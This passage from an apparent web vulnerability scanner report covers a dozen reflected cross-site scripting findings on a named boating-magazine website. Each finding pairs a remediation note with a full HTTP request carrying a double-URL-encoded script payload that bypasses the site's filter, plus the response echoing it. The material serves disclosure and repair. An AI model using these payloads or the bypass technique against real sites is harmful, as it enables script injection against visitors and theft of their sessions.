This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs?e172f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e12aae247207=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs?e172f"><script>alert(1)</script>12aae247207=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.881. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f903b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effe0e5a13b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f903b"><script>alert(1)</script>ffe0e5a13b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/bay-tripper?f903b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effe0e5a13b4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/bay-tripper?f903b"><script>alert(1)</script>ffe0e5a13b4=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.882. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e793223f03aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fe9a"><script>alert(1)</script>793223f03aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/books?8fe9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e793223f03aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/books?8fe9a"><script>alert(1)</script>793223f03aa=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.883. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66943ccc600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e9a3"><script>alert(1)</script>66943ccc600 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/new-england-fishing?6e9a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66943ccc600=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/new-england-fishing?6e9a3"><script>alert(1)</script>66943ccc600=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.884. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbc2528d353 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87b09"><script>alert(1)</script>cbc2528d353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/under-way?87b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbc2528d353=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/under-way?87b09"><script>alert(1)</script>cbc2528d353=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.885. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b994%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e013ba99ca1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b994"><script>alert(1)</script>013ba99ca1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /component/yvcomment/?6b994%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e013ba99ca1c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/component/yvcomment/?6b994"><script>alert(1)</script>013ba99ca1c=1&amp;start=20" title="2">
...[SNIP]...

4.886. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bf4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f33f21489 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30bf4"><script>alert(1)</script>c3f33f21489 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contact-us?30bf4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f33f21489=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/contact-us?30bf4"><script>alert(1)</script>c3f33f21489=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.887. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f351c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d6af0ba0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f351c"><script>alert(1)</script>4d6af0ba0d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features?f351c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d6af0ba0d9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features?f351c"><script>alert(1)</script>4d6af0ba0d9=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.888. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e099334d02e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c7d"><script>alert(1)</script>099334d02e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/destinations?51c7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e099334d02e6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/destinations?51c7d"><script>alert(1)</script>099334d02e6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.889. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ef455a60d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73579"><script>alert(1)</script>57ef455a60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/in-depth?73579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ef455a60d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/in-depth?73579"><script>alert(1)</script>57ef455a60d=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.890. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67be2bf67f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dd2b"><script>alert(1)</script>67be2bf67f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/justyesterday?1dd2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67be2bf67f4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/justyesterday?1dd2b"><script>alert(1)</script>67be2bf67f4=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.891. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f2d84a438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3fd13"><script>alert(1)</script>73f2d84a438 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/lifestyle?3fd13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f2d84a438=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/lifestyle?3fd13"><script>alert(1)</script>73f2d84a438=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.892. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

